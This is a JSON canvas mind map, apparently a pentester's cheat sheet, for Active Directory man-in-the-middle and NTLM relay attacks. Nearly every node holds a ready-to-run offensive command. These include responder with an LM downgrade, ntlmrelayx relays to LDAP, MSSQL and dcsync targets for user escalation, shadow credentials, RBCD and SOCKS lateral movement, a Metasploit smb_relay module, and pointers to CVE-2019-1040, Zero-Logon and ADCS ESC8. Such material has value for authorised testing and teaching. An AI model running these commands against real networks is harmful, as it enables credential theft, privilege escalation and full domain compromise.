{
	"nodes":[
		{"id":"5025c16b64ca1a4a","type":"group","x":-2120,"y":-869,"width":4240,"height":1739,"color":"3","label":"MITM (LISTEN & RELAY)"},
		{"id":"ed20ee9a2efa30a4","type":"text","text":"```bash\n- 🟣 pywsus.py\n```","x":-841,"y":785,"width":220,"height":65},
		{"id":"ba2a66488f0ec76a","type":"text","text":"```bash\n- Ⓜ️ use exploit/windows/smb/smb_relay # windows200 / windows server 2008\n```","x":-534,"y":-525,"width":732,"height":60},
		{"id":"c7f7172afbc282af","type":"text","text":"Relay to LDAP","x":159,"y":-380,"width":181,"height":56},
		{"id":"f09a498b752ac9de","type":"text","text":"NetNTMLv1","x":-803,"y":-430,"width":160,"height":50},
		{"id":"6cea719e5c893e0d","type":"text","text":"NetNTMLv2","x":-803,"y":-330,"width":160,"height":50},
		{"id":"77fc1a4d63eaca8e","type":"text","text":"Remove mic","x":-336,"y":-430,"width":160,"height":50},
		{"id":"9b165160f7bd8574","type":"text","text":"# HTTP ADCS web","x":-833,"y":249,"width":307,"height":50},
		{"id":"d44eaf03d1fa19c1","type":"text","text":"SCCM NTLM relay attack","x":-833,"y":349,"width":270,"height":55},
		{"id":"9c1f82ba53168cd3","type":"text","text":"Relay to MSSQL","x":-823,"y":461,"width":190,"height":50},
		{"id":"c54c4c5a68a227cf","type":"text","text":"# ADMIN","x":312,"y":-520,"width":168,"height":50},
		{"id":"3c5cd7cdc3a19dfc","type":"text","text":"Relay on itself","x":-1181,"y":-522,"width":181,"height":57},
		{"id":"f53f9b1cbcb47ad9","type":"text","text":"# SMB -> LDAP(S)","x":-1181,"y":-380,"width":298,"height":50},
		{"id":"f590d4f14c712eca","type":"text","text":"SMB unsigned","x":-861,"y":22,"width":181,"height":50},
		{"id":"517640996cd20f2f","type":"text","text":"# NetNTLMv1","x":-136,"y":-829,"width":236,"height":50,"color":"2"},
		{"id":"55db39376addb0b4","type":"text","text":"# NetNTLMv2","x":-136,"y":-761,"width":236,"height":50,"color":"2"},
		{"id":"1a3d76f293b67fb1","type":"text","text":"# USERS","x":-136,"y":-689,"width":176,"height":50,"color":"#4c63d6"},
		{"id":"38d8a6d725978555","type":"text","text":"# 💥 MS08-068\n","x":-866,"y":-519,"width":276,"height":50},
		{"id":"6a52f924c9378d04","type":"text","text":"# -> SMB","x":-1181,"y":22,"width":178,"height":50},
		{"id":"925c96325780226f","type":"text","text":"# -> MSSQL","x":-1181,"y":461,"width":218,"height":50},
		{"id":"5be7ee3bf586b1be","type":"text","text":"```bash\n- 🔥⚪ responder -I '<network_interface>' # use `--lm` to force lm downgrade\n```","x":-1181,"y":-849,"width":741,"height":60},
		{"id":"6d04373c7a5e03c0","type":"text","text":"```bash\n- 🟣 smbclient.py # listen\n```","x":-1181,"y":-682,"width":315,"height":53},
		{"id":"709e25209375928d","type":"text","text":"# Listen","x":-1600,"y":-774,"width":159,"height":50},
		{"id":"f9e4f1b0cb45d12f","type":"text","text":"# MITM (LISTEN & RELAY)","x":-2100,"y":23,"width":400,"height":50,"color":"3"},
		{"id":"e32b29c5b78d03c6","type":"text","text":"# ARP poisoning","x":-1600,"y":792,"width":279,"height":50},
		{"id":"08c16d753b7efffe","type":"text","text":"# -> SMB -> Netlogon","x":-1181,"y":624,"width":338,"height":50},
		{"id":"0b27a26a064d3373","type":"text","text":"# WSUS relay","x":-1181,"y":792,"width":240,"height":50},
		{"id":"7b8f871bc6046594","type":"text","text":"# NTLM relay","x":-1600,"y":23,"width":238,"height":50},
		{"id":"f2e5248594536aa2","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py -t dcsync://'<dc02_ip>' -smb2support -auth-smb '<user>':'<password>'\n```","x":519,"y":617,"width":840,"height":65},
		{"id":"12701aba4623306d","type":"text","text":"# RBCD","x":1940,"y":-426,"width":160,"height":50},
		{"id":"c190238136c41ef7","type":"text","text":"```bash\n- ⚪ nmap -Pn -sS -T4 --open --script smb-security-mode -p445 '<cidr>'\n- Ⓜ️ use exploit/windows/smb/smb_relay\n- 🕷️ nxc smb '<cidr>' --gen-relay-list '<output>'\n```","x":-13,"y":-109,"width":706,"height":116},
		{"id":"0e9cfa371df95743","type":"text","text":"Find SMB not signed (default on non DC)","x":-476,"y":-76,"width":387,"height":50},
		{"id":"bb7ef182b890c647","type":"text","text":"# USERS","x":320,"y":72,"width":170,"height":50},
		{"id":"a94a5d45fbaad6ae","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py -t ldaps://'<dc>' --remove-mic --add-computer '<computer_name>' '<computer_password>' --delegate-access -smb2support\n```","x":623,"y":-435,"width":1237,"height":68},
		{"id":"fec1a671b1451629","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py --remove-mic --escalate-user '<user>' -t ldap://'<dc_fqdn>' -smb2support\n```","x":623,"y":-522,"width":877,"height":60},
		{"id":"99f3caf8f32db07c","type":"text","text":"# DCSYNC","x":1600,"y":-517,"width":200,"height":50},
		{"id":"0361dfc38bf76186","type":"text","text":"# -> HTTP","x":-1181,"y":299,"width":198,"height":50},
		{"id":"aa88ad11cc2c3ca6","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py -tf '<targets.txt>' -smb2support (-6) --enum-domain\n```","x":-476,"y":72,"width":696,"height":50},
		{"id":"72c07faccd02fe9a","type":"text","text":"# DCSYNC","x":1439,"y":625,"width":201,"height":50},
		{"id":"0fa60f9a3c71a8a8","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py -t ldap://'<dc>' --shadow-credentials --shadow-target '<dc>'\n```","x":623,"y":-338,"width":767,"height":58},
		{"id":"04c6b0703c8f542f","type":"text","text":"# USERS","x":1610,"y":-242,"width":170,"height":50},
		{"id":"a331132acde2211f","type":"text","text":"# SHADOW CREDENTIALS","x":1480,"y":-334,"width":420,"height":50},
		{"id":"c7a6181b20e9e23f","type":"text","text":"# LATERAL MOVE (SOCKS)","x":320,"y":157,"width":420,"height":50},
		{"id":"ef3cd21c19c57500","type":"text","text":"# 💥 Remove mic (CVE-2019-1040)","x":-476,"y":-330,"width":543,"height":50},
		{"id":"31348bb5e4e25cae","type":"text","text":"# LATERAL MOVE (SOCKS)","x":239,"y":461,"width":421,"height":50},
		{"id":"08306751db4966e0","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py -t mssql://'<ip>' -smb2support -socks\n```","x":-476,"y":461,"width":576,"height":50},
		{"id":"252d71200784d356","type":"text","text":"# ADCS (ESC8)","x":-476,"y":249,"width":256,"height":50,"color":"#a13698"},
		{"id":"eb3a93dc6caf5fe9","type":"text","text":"```bash\n- 🔥🟣 ntlmrelayx.py -tf '<targets.txt>' -smb2support -socks (-6)\n```","x":-476,"y":157,"width":656,"height":50},
		{"id":"4551dd3be215aa97","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py -wh '<attacker_ip>' -t ldap://'<target>' -l /tmp -6 -debug\n```","x":623,"y":-247,"width":886,"height":59},
		{"id":"48916cf256275f68","type":"text","text":"# 💥 Zero-Logon : safe method (CVE-2020-1472)","x":-771,"y":624,"width":731,"height":50},
		{"id":"83312a3048069189","type":"text","text":"Coerce come from DC01, relay to DC02","x":34,"y":624,"width":425,"height":50},
		{"id":"d063537957ba58a5","type":"text","text":"# HTTP(S) -> LDAP","x":-1181,"y":-163,"width":318,"height":54}
	],
	"edges":[
		{"id":"5bef2bea03d9c04a","fromNode":"d063537957ba58a5","fromSide":"right","toNode":"c7f7172afbc282af","toSide":"left"},
		{"id":"ce419a4afd7251c4","fromNode":"7b8f871bc6046594","fromSide":"right","toNode":"d063537957ba58a5","toSide":"left"},
		{"id":"b0a0fe0b30b2dbb8","fromNode":"f53f9b1cbcb47ad9","fromSide":"right","toNode":"f09a498b752ac9de","toSide":"left"},
		{"id":"a4d05a204142fe14","fromNode":"f53f9b1cbcb47ad9","fromSide":"right","toNode":"6cea719e5c893e0d","toSide":"left"},
		{"id":"ab636dbd5f498e38","fromNode":"7b8f871bc6046594","fromSide":"right","toNode":"f53f9b1cbcb47ad9","toSide":"left"},
		{"id":"ce08e218b367ecc7","fromNode":"f9e4f1b0cb45d12f","fromSide":"right","toNode":"7b8f871bc6046594","toSide":"left"},
		{"id":"ca08483446671ed6","fromNode":"f9e4f1b0cb45d12f","fromSide":"right","toNode":"709e25209375928d","toSide":"left"},
		{"id":"ee6ef1890562466a","fromNode":"f9e4f1b0cb45d12f","fromSide":"right","toNode":"e32b29c5b78d03c6","toSide":"left"},
		{"id":"3826f28900d9d5a7","fromNode":"a94a5d45fbaad6ae","fromSide":"right","toNode":"12701aba4623306d","toSide":"left"},
		{"id":"d9af1ba9d353c359","fromNode":"0fa60f9a3c71a8a8","fromSide":"right","toNode":"a331132acde2211f","toSide":"left"},
		{"id":"19e181398756122d","fromNode":"c7f7172afbc282af","fromSide":"right","toNode":"0fa60f9a3c71a8a8","toSide":"left"},
		{"id":"3635593478c14ae2","fromNode":"4551dd3be215aa97","fromSide":"right","toNode":"04c6b0703c8f542f","toSide":"left"},
		{"id":"a277df6996c76889","fromNode":"0e9cfa371df95743","fromSide":"right","toNode":"c190238136c41ef7","toSide":"left"},
		{"id":"6e06885298fa8d36","fromNode":"c7f7172afbc282af","fromSide":"right","toNode":"a94a5d45fbaad6ae","toSide":"left"},
		{"id":"a2ec3badabe05269","fromNode":"f2e5248594536aa2","fromSide":"right","toNode":"72c07faccd02fe9a","toSide":"left"},
		{"id":"cef938514a36b031","fromNode":"83312a3048069189","fromSide":"right","toNode":"f2e5248594536aa2","toSide":"left"},
		{"id":"65ababff2f7a8765","fromNode":"eb3a93dc6caf5fe9","fromSide":"right","toNode":"c7a6181b20e9e23f","toSide":"left"},
		{"id":"73dd7fb4d037e9ab","fromNode":"6a52f924c9378d04","fromSide":"right","toNode":"f590d4f14c712eca","toSide":"left"},
		{"id":"173408764d421ee6","fromNode":"7b8f871bc6046594","fromSide":"right","toNode":"6a52f924c9378d04","toSide":"left"},
		{"id":"2d20b9d2b2c08d90","fromNode":"f590d4f14c712eca","fromSide":"right","toNode":"aa88ad11cc2c3ca6","toSide":"left"},
		{"id":"e5a1f764d200ec5b","fromNode":"f590d4f14c712eca","fromSide":"right","toNode":"eb3a93dc6caf5fe9","toSide":"left"},
		{"id":"72cd6c30e4fe2640","fromNode":"f590d4f14c712eca","fromSide":"right","toNode":"0e9cfa371df95743","toSide":"left"},
		{"id":"67a3af7376fa35b7","fromNode":"5be7ee3bf586b1be","fromSide":"right","toNode":"517640996cd20f2f","toSide":"left","color":"2"},
		{"id":"8531551b133f5720","fromNode":"6d04373c7a5e03c0","fromSide":"right","toNode":"517640996cd20f2f","toSide":"left","color":"2"},
		{"id":"d7933469984f99e0","fromNode":"ba2a66488f0ec76a","fromSide":"right","toNode":"c54c4c5a68a227cf","toSide":"left"},
		{"id":"917795d6798167d8","fromNode":"38d8a6d725978555","fromSide":"right","toNode":"ba2a66488f0ec76a","toSide":"left"},
		{"id":"07ae6bb904f1808f","fromNode":"c7f7172afbc282af","fromSide":"right","toNode":"4551dd3be215aa97","toSide":"left"},
		{"id":"1ed3f3a01b2abd9a","fromNode":"ef3cd21c19c57500","fromSide":"right","toNode":"c7f7172afbc282af","toSide":"left"},
		{"id":"5ec51aab0f75e0ae","fromNode":"6cea719e5c893e0d","fromSide":"right","toNode":"ef3cd21c19c57500","toSide":"left"},
		{"id":"fd23380417427883","fromNode":"c7f7172afbc282af","fromSide":"right","toNode":"fec1a671b1451629","toSide":"left"},
		{"id":"363fb03dc6e34a26","fromNode":"77fc1a4d63eaca8e","fromSide":"right","toNode":"c7f7172afbc282af","toSide":"left"},
		{"id":"1a30b9b11d188d4f","fromNode":"f09a498b752ac9de","fromSide":"right","toNode":"77fc1a4d63eaca8e","toSide":"left"},
		{"id":"7d338c6b774af492","fromNode":"5be7ee3bf586b1be","fromSide":"right","toNode":"55db39376addb0b4","toSide":"left","color":"2"},
		{"id":"879b3d12f1de82c7","fromNode":"6d04373c7a5e03c0","fromSide":"right","toNode":"55db39376addb0b4","toSide":"left","color":"2"},
		{"id":"ab328782c2b9c938","fromNode":"5be7ee3bf586b1be","fromSide":"right","toNode":"1a3d76f293b67fb1","toSide":"left","color":"#4443a3"},
		{"id":"50a0d529760217ac","fromNode":"6d04373c7a5e03c0","fromSide":"right","toNode":"1a3d76f293b67fb1","toSide":"left","color":"#4443a3"},
		{"id":"9f83879765ddb842","fromNode":"3c5cd7cdc3a19dfc","fromSide":"right","toNode":"38d8a6d725978555","toSide":"left"},
		{"id":"0a80cf8802fa8bb1","fromNode":"7b8f871bc6046594","fromSide":"right","toNode":"3c5cd7cdc3a19dfc","toSide":"left"},
		{"id":"6753ca2e16da0242","fromNode":"fec1a671b1451629","fromSide":"right","toNode":"99f3caf8f32db07c","toSide":"left"},
		{"id":"ece0fa98bdfbf7e1","fromNode":"709e25209375928d","fromSide":"right","toNode":"5be7ee3bf586b1be","toSide":"left"},
		{"id":"48c87de49863b7b5","fromNode":"9b165160f7bd8574","fromSide":"right","toNode":"252d71200784d356","toSide":"left"},
		{"id":"e1b82220294bc720","fromNode":"0361dfc38bf76186","fromSide":"right","toNode":"9b165160f7bd8574","toSide":"left"},
		{"id":"85441958e5ca16b1","fromNode":"0361dfc38bf76186","fromSide":"right","toNode":"d44eaf03d1fa19c1","toSide":"left"},
		{"id":"acb2b72e5413cd5c","fromNode":"e32b29c5b78d03c6","fromSide":"right","toNode":"0b27a26a064d3373","toSide":"left"},
		{"id":"e5416c13fe45fde4","fromNode":"08c16d753b7efffe","fromSide":"right","toNode":"48916cf256275f68","toSide":"left"},
		{"id":"97c1a23a600410fa","fromNode":"0b27a26a064d3373","fromSide":"right","toNode":"ed20ee9a2efa30a4","toSide":"left"},
		{"id":"d8b4771923ce45c9","fromNode":"9c1f82ba53168cd3","fromSide":"right","toNode":"08306751db4966e0","toSide":"left"},
		{"id":"d5e97eb11ca62256","fromNode":"925c96325780226f","fromSide":"right","toNode":"9c1f82ba53168cd3","toSide":"left"},
		{"id":"123599e0a5661b9b","fromNode":"08306751db4966e0","fromSide":"right","toNode":"31348bb5e4e25cae","toSide":"left"},
		{"id":"394eb9ca3dd40d46","fromNode":"709e25209375928d","fromSide":"right","toNode":"6d04373c7a5e03c0","toSide":"left"},
		{"id":"e1e9ed0aae92328e","fromNode":"7b8f871bc6046594","fromSide":"right","toNode":"925c96325780226f","toSide":"left"},
		{"id":"cd5ba327e3b93db9","fromNode":"7b8f871bc6046594","fromSide":"right","toNode":"0361dfc38bf76186","toSide":"left"},
		{"id":"943cb7b8908f0ebc","fromNode":"48916cf256275f68","fromSide":"right","toNode":"83312a3048069189","toSide":"left"},
		{"id":"59f4c8cc353bc276","fromNode":"aa88ad11cc2c3ca6","fromSide":"right","toNode":"bb7ef182b890c647","toSide":"left"}
	]
}